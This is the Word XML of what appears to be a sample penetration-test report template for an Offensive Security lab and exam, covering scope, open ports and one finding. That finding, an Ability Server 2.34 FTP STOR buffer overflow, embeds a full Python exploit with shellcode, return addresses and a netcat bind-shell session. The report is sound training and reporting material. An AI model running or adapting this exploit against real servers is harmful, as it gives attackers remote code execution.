          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc59959352"/>
      <w:r w:rsidRPr="00BB687E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">3.0 Sample Report </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB687E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>– Methodologies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="4990D940"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John utilized a widely adopted approach to performing penetration testing that is effective in testing how well the Offensive Security Labs and Exam environments are secure. Below is a breakout of how John was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EB4D0E"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7" w:name="_Toc59959353"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Sample Report </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>– Information Gathering</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="61F80600"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information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, John was tasked with exploiting the lab and exam network. The specific IP addresses were:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030B07C5" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5935B4E8" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>192.168.1.1, 192.168.1.2, 192.168.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6A05CA" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exam Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6D219A" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>172.16.203.133, 172.16.203.134, 172.16.203.135, 172.16.203.136</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AED74E" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="29869451"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8" w:name="_Toc59959354"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.2 Sample Report – Service Enumeration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="2AF4BE1F"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945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27"/>
        <w:gridCol w:w="4727"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C32FD" w14:paraId="5478F969" w14:textId="77777777" w:rsidTr="00BB687E">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4727"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0A2E64CF" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
                <w:color w:val="FFFFFF"/>
                <w:u w:color="FFFFFF"/>
              </w:rPr>
              <w:t>Server IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4727"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30DE1FDC" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
                <w:color w:val="FFFFFF"/>
                <w:u w:color="FFFFFF"/>
              </w:rPr>
              <w:t>Ports Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C32FD" w14:paraId="21ADA167"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051DB7" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>192.168.1.1</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1D6E4" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t>TCP:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> 21,22,25,80,443</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C32FD" w14:paraId="7D3D86E9"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15A537" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>192.168.1.2</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FFCAE" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t>TCP:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> 22,55,90,8080,80</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C32FD" w14:paraId="33DA6A78" w14:textId="77777777" w:rsidTr="00BB687E">
        <w:trPr>
          <w:trHeight w:val="947"/>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6D8178" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>192.168.1.3</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0CB6EE" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t>TCP:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1433,3389 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12D2963D" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t xml:space="preserve">UDP: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>1434,161</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34CA6379" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5356DB58"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9" w:name="_Toc59959355"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.3 Sample Report – Penetration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="46299643" w14:textId="003E665A" w:rsidR="00F23122" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. During this penetration test, John was able to successfully gain access to 10 out of the 50 systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E92BF6" w14:textId="77777777" w:rsidR="00F23122" w:rsidRDefault="00F23122">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:color="000000"/>
          <w:lang w:eastAsia="en-ZA"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>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326"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C32FD" w14:paraId="41428F0C" w14:textId="77777777" w:rsidTr="00BB687E">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="326" w:type="dxa"/>
          <w:trHeight w:val="11440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="90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4765345" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
                <w:color w:val="4F81BD"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:color="4F81BD"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Vulnerability Exploited:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:color="4F81BD"/>
              </w:rPr>
              <w:t>Ability Server 2.34 FTP STOR Buffer Overflow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A654A1F" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t xml:space="preserve">System Vulnerable: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>172.16.203.134</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AD948BF" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t>Vulnerability Explanation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>: Ability Server 2.34 is subject to a buffer overflow vulnerability in STOR field. Attackers can use this vulnerability to cause arbitrary remote code execution and take completely control over the system. When performing the penetration test, John noticed an outdated version of Ability Server running from the service enumeration phase. In addition, the operating system was different from the known public exploit. A rewritten exploit was needed in order for successful code execution to occur. Once the exploit was rewritten, a targeted attack was performed on the system which gave John full administrative access over the system.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CC8BE26" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t>Vulnerability Fix</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve">: The publishers of the Ability Server have issued a patch to fix this known issue. It can be found here: </w:t>
            </w:r>
            <w:hyperlink r:id="rId8" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink0"/>
                  <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
                </w:rPr>
                <w:t>http://www.code-crafters.com/abilityserver/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="2C338DE6" w14:textId="77777777"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50D77F14"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Proof of Concept Code Here:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>Modifications to the existing exploit was needed and is highlighted in red.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="763309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1F0F51B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Ability Server 2.34 FTP STOR Buffer Overflow   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29BD89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Advanced, secure and easy to use FTP Server. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6741A52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21 Oct 2004 - muts                                      </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C6A9D6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0125E53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D:\BO&gt;ability-2.34-ftp-stor.py                       </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25D6620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2C7C0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D:\data\tools&gt;nc -v 127.0.0.1 4444               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C23D00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localhost [127.0.0.1] 4444 (?) open               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74F0035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Microsoft Windows XP [Version 5.1.2600]        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36BC95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lastRenderedPageBreak/>
              <w:t xml:space="preserve"># (C) Copyright 1985-2001 Microsoft Corp.        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BCDB6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D:\Program Files\abilitywebserver&gt;                </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DEB5BF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6934369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131F6EF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import ftplib</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37EFC17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from ftplib import FTP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03DE72C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import struct</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07E660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"\n\n################################"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C0F67B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"\nAbility Server 2.34 FTP STOR buffer Overflow"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="660B5B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print "\nFor Educational Purposes Only!\n" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CB3036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
          <w:p w14:paraId="5A969C7F"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5EFEADA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Shellcode taken from Sergio Alvarez's "Win32 Stack Buffer Overflow Tutorial"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B596AC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60628FE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"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4037D74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"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3949AA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"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A2D8AE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"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="203586F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"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4088B36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"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5756B32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"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3422F4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"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C17E5F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"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BDE63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"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DA335C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"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1953AB7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"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39E53A8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"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A0378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lastRenderedPageBreak/>
              <w:t>sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62403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"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="538972B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"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B024BD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"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="022458E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"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4772D7E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"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BD09D4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"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D2F2CD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"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05D767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sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33B14D9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Change RET address if need be.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33F94E8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'\x41'*966+struct.pack('&lt;L', 0x7C2FA0F7)+'\x42'*32+sc # RET Windows 2000 Server SP4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E455F6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'\x41'*970+struct.pack('&lt;L', 0x7D17D737)+'\x42'*32+sc # RET Windows XP SP2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46693F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4EB4A4A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Edit the IP, Username and Password.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="031D6E2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ftp = FTP('127.0.0.1') </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B171BE5"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ftp.login('ftp','ftp')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6095D83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"\nEvil Buffer sent..."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F9587E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"\nTry connecting with netcat to port 4444 on the remote machine."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="568BB0C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48090E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"\nCould not Connect to FTP Server."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E8A49E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3A431FC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ftp.transfercmd("STOR " + buffer) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C26F9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3E4BCA8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"\nDone."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="558EB1B1" w14:textId="77777777" w:rsidR="00F23122" w:rsidRDefault="00F23122">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="76694442" w14:textId="1622F145"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Screenshot Here:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F6C854C" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2123DFDE" wp14:editId="1A02D0A7">
                  <wp:extent cx="4638675" cy="2419350"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                  <wp:docPr id="1073741827" name="officeArt object" descr="image.png"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1073741827" name="image.png" descr="image.png"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4638679" cy="2419352"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln w="12700" cap="flat">
                            <a:noFill/>
                            <a:miter lim="400000"/>
                          </a:ln>
                          <a:effectLst/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C32FD" w14:paraId="33C5BCE2" w14:textId="77777777" w:rsidTr="00F23122">
        <w:trPr>
          <w:trHeight w:val="11234"/>
